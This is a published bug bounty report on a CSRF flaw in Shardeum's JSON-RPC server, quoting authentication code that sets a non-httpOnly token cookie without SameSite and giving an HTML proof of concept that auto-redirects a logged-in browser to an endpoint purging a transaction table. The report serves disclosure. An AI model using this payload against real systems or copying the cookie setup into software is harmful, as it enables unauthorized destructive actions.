Boost _ Shardeum_ Ancillaries 34367 - [Websites and Applications - Low] CSRF vulnerability due to mi

Submitted on Sat Aug 10 2024 12:56:34 GMT-0400 (Atlantic Standard Time) by @hulkvision for Boost | Shardeum: Ancillaries

Report ID: #34367

Report type: Websites and Applications

Report severity: Low

Target: https://github.com/shardeum/json-rpc-server/tree/dev

Impacts:

CSRF vulnerability allowing blackhat to perform authenticated actions
Changing sensitive details of other users (including modifying browser local storage) without already-connected wallet interaction and with up to one click of user interaction, such as: Email, Password of the victim etc.

Description

Brief/Intro

The access-token was missing SameSite=Strict attribute which leads to CSRF vulnerability resulting in allowing BlackHat to perform authenticated actions.

Vulnerability Details

In src/routes/authenticate.ts

router.route('/:passphrase').get(async function (req: Request, res: Response) {
  const { passphrase } = req.params
  const payload = { user: 'shardeum-dev' }
  if (passphrase === CONFIG.passphrase) {
    // token don't expire, usually this is bad practice
    // for the case being implementing refresh token is overkill
    // stolen token worst case scenario our debug data ended up being not useful.
    const token = jwt.sign(payload, CONFIG.secret_key)
    res.cookie('access_token', token, {
      httpOnly: false,
      maxAge: 1000 * 60 * 60 * 700, // ~ a month
    })
    return res.send({ token: token, message: 'authenticated and authorized for debug api calls' }).status(200)
  }
  return res.send({ message: 'wrong passphrase' }).status(400)
})

After authenticating the rpc server does not define SameSite=Strict cookie restriction, which results in allowing malicious websites to call authenticated GET API which perform actions like purging tables,modifying config values, node subscription etc.

Impact Details

The vulnerability allows malicious websites performing actions like purging tables,modifying config values, node subscription etc.
The vulnerability could result in deletion of debug data.

References

https://github.com/shardeum/json-rpc-server/blob/d799a64c1ab4a7cffdf472a8be689fe7afb993e9/src/routes/authenticate.ts#L15-L18

Proof of concept

Proof of Concept

<!DOCTYPE html>
<html>
<head>
	<meta charset="utf-8">
	<meta name="viewport" content="width=device-width, initial-scale=1">
	<title>csrf performing authenticated action</title>
</head>
<body>
	<h1> calling /log/cleanTxTable which will trigger purging of table that store transaction logging </h1>
	<a href="http://127.0.0.1:8888/log/cleanTxTable"> click here to attack </a>
</body>

<script type="text/javascript">
	function callAutomatically() {
        document.location = 'http://127.0.0.1:8888/log/cleanTxTable';
    }

    setTimeout(callAutomatically,3000);

</script>
</html>

Steps to Reproduce

Authenticate to RPC server with password
Save the poc file as csrfpoc.html
Open csrfpoc.html from the browser you have authenticated with RPC server.
Either click on Click here to attack or wait 3 second for attack to happen automatically
You will see a response {"success":true}

PreviousBoost _ Shardeum_ Ancillaries 34298 - [Websites and Applications - Medium] archive-server can be kil NextBoost _ Shardeum_ Ancillaries 34392 - [Websites and Applications - Medium] JSON-RPC Complete Passwor

Last updated 1 year ago

Was this helpful?

hashtagDescription

hashtagBrief/Intro

hashtagVulnerability Details

hashtagImpact Details

hashtagReferences

hashtagProof of concept

hashtagProof of Concept

hashtagSteps to Reproduce